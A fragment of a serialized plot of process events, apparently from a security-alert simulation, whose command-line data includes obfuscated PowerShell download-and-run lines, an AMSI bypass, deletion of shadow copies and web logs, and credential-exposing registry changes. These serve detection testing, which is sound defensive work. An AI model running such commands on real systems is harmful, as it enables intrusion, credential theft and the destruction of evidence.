:\"y_index\"}},\"id\":\"1070\",\"type\":\"Scatter\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1088\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1029\"}},\"id\":\"1025\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1103\",\"type\":\"DaysTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"1078\"},\"major_label_policy\":{\"id\":\"1076\"},\"ticker\":{\"id\":\"1021\"},\"visible\":false},\"id\":\"1020\",\"type\":\"LinearAxis\"},{\"attributes\":{\"start\":-1.0},\"id\":\"1010\",\"type\":\"Range1d\"},{\"attributes\":{\"formatter\":{\"id\":\"1054\"},\"major_label_policy\":{\"id\":\"1081\"},\"ticker\":{\"id\":\"1049\"}},\"id\":\"1048\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"ResetTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1090\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Event Timeline\"},\"id\":\"1006\",\"type\":\"Title\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1066\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1106\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1046\",\"type\":\"LinearScale\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1028\",\"type\":\"PanTool\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1093\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1104\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1021\",\"type\":\"BasicTicker\"},{\"attributes\":{\"data\":{\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg  not /domain:everything that /sid:shines is\\n/krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\"1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\"reg.exe\",\".\\\\reg.exe  add\\n\\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTI\\nCAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.\\n0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\M\\nSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication\\njavascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial\\ncommandline solely for purposes of triggering\\ntest\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nSet-ExecutionPolicy RemoteSigned&echo [S]&cd&echo\\n[E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nEnable-WSManCredSSP =2013Role Server -force&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell\\nwinrm set winrm/config/service/Auth\\n@{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED\\n]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change\\nDates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\s\\nystem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del\\nC:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo\\n[S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"vssadmin  delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe\\n/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c\\nc:\\\\Diagnostics\\\\WindowsSimulateDetections.bat\\nc:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"cmd  /c echo Any questions about the commands\\nexecuted here then please contact one of\",\"cmd  /c echo timb@microsoft.com;\\nromead@microsoft.com; ianhelle@microsoft.com;\\nmarcook@microsoft.com; dotanp@microsoft.com;\\nliengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator\\nBob_testing /add\",\"net  share TestShare=c:\\\\testshare\\n/Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1  share\\nTestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-\\nServices /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare\\nBob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe\\n{D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicin\\ngstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60\\n20e2207416d\\\\TiWorker.exe -Embedding\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare /delete\",\"net  user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator\\n/delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct\\nscrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\suchost.exe   -a cryptonight -o bcn -u\\nbond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\n>> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\n>> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`\\nC`li`en`t).DownloadFile('https://blah/png','google\\n.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell.exe  -c \\\"$a =\\n'Download'+'String'+\\\"(('ht'+'tp://paste'+\\n'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + '\\nNet.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  -c {IEX (New-Object\\nNet.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f\\n':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17\\n','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy\\nBYpa^sS i^mPOr^T-^M^oDuLE\\nbiTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^\\n'http://somedomain/best-kitten-names-1.jpg'\\n^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\\\nLocal\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0\\nACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAc\\ngBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\n>> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\n>> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"certutil  -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process;\\nInvoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  -Noninteractive -Noprofile -Command\\n\\\"Invoke-Expression Get-Process; Invoke-WebRequest\\n-Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\powershell  -command \\\"(New-Object\\nNet.WebClient).DownloadString(('ht'+'tp://pasteb'\\n+ 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1  localgroup\\nAdministrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user Bob1 /domain\",\"net  user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1  group \\\"Domain Admins\\\"\\n/domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add\\n\\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal\\nServer\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d\\n0x1 /f\",\".\\\\reg  add\\n\\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal\\nServer\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d\\n0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:Cre\\nateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe\\n-c \\\"\\\"$x=$((gp\\nHKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\nCertificate).Certificate);.\\\\powershell -E\\n$y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule\\nname=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\app\\ndata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityprovi\\nders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\")\",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype\\n('http://system.management.automation.amsiutils').\\ngetfield('amsiinitfailed','nonpublic,static').setv\\nalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 trac\\nefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzz\\nzz.txt\",\".\\\\wuauclt.exe  /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\".\\\\lsass.exe  /C\\n\\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd  /c \\\"powershell wscript.shell used to download\\na .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t\\n/g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\sys\\ntem32\\\\inetsrv\\\\appcmd set config \\\"Default Web\\nSite/\\\" /section:httplogging /dontLog:true&echo\\n[S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set\\nopmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com\\nabc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR 